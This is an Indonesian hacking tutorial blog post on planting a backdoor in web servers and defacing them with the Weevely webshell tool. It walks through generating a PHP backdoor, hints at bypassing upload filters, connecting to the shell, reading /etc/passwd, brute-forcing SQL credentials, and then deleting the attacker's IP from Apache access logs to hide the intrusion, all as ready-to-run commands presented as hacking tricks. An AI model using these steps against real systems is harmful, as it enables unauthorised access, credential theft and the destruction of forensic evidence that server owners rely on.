Cara Backdoor dan Deface Web Server Menggunakan Weevely



Weevely merupakan sebuah Webshell Management Tool yang ditulis menggunkakan bahasa pemrograman Phyton. Weevely hanya ini tersedia untuk sistem operasi Linux.

Bagaimana cara melakukan Backdoor dan Deface Web Server Menggunakan Weevely?

Langsung saja ke langkah-langkahnya.

Baca juga,

Instalasi
root@ddos:~# pip install prettytable Mako PyYAML python-dateutil PySocks –upgrade
root@ddos:~# apt-get install g++ python-pip libyaml-dev python-dev

Cara menjalankan Weevely

Backdoor dan Deface Web Server Menggunakan Weevely


Membuat sebuah Backdoor
root@ddos:~# weevely generate ddos ddos.php 
*bd core ddos.php modules utils weevely.py

Anda perlu menggunakan beberapa teknik untuk mengunggah webshell seperti teknik double extension, bypass image type validation, bypass whilelist/blacklist.
Lihat disini

Koneksikan ke Backdoor
root@ddos:/usr/share/weevely# weevely http://192.168.1.8/ddos.php ddos
Backdoor dan Deface Web Server Menggunakan Weevely


Bypass Policy to Read /etc/passwd
www-data@ddos:/etc $ audit_etcpasswd
Backdoor dan Deface Web Server Menggunakan Weevely


Menebak Credential SQL user
Langkah ini merupakan cara menebak kredensial dari beberapa pengguna SQL.
weevely> bruteforce_sql –help
Backdoor dan Deface Web Server Menggunakan Weevely


Pembersihan log
Trik ini untuk adalah cara membersihkan catatan log pada server.

Backdoor dan Deface Web Server Menggunakan Weevely


Disini kita gunakan command system_info untuk mendapatkan Ip yang kita gunakan
www-data@ddos:/var/log $ system_info -info client_ip

Kita gunakan grep command untuk mengkonfirm bahwa Ip yang telah kita dapatkan berada dalam file Log
www-data@ddos:/var/log/apache2 $ cat ‘/var/log/apache2/access.log.1’ |grep “192.168.1.8”
Backdoor dan Deface Web Server Menggunakan Weevely


Kita akan melihat bahwa aktifitas Ip kita telah terecord atau terekam pada Log.
Disini kita akan menggunakan perintah Grep untuk menghapus Ip lalu menyimpannya ke file sementara / temporary file.
www-data@ddos:/var/log/apache2 $ cat ‘/var/log/apache2/access.log.1’ |grep -v “192.168.1.8” > cleaned.log

Silahkan uji apakah Ip telah berhasil kita hapus
www-data@ddos:/var/log/apache2 $ cat ‘/var/log/apache2/access.log.1’ |grep -v “192.168.1.8” > cleaned.log
www-data@ddos:/var/log/apache2 $ cat cleaned.log |grep “192.168.1.8”
www-data@ddos:/var/log/apache2 $ 

Lalu kita ganti file cleaned.log dengan access.log.1
www-data@ddos:/var/log/apache2 $ rm access.log.1
www-data@ddos:/var/log/apache2 $ mv cleaned.log access.log.1

Demo


JANGAN LEWATKAN TRIK HACKS INI : Jika Anda ingin berkomentar atau bertanya tentang topik artikel cara hacking tips trik Cara Backdoor dan Deface Web Server Menggunakan Weevely diatas atau lainnya silahkan untuk mengunjungi halaman fanspage facebook ArtikelCara10 Hacking Tutorials kami, dan berkontribusi dengan menyukai halaman dengan meng-klik Like. ~ AC10 2018 ~
Share tips trik hacking ini ke teman Anda
Tips Trik Tutorial Hacking Cara Backdoor dan Deface Web Server Menggunakan Weevely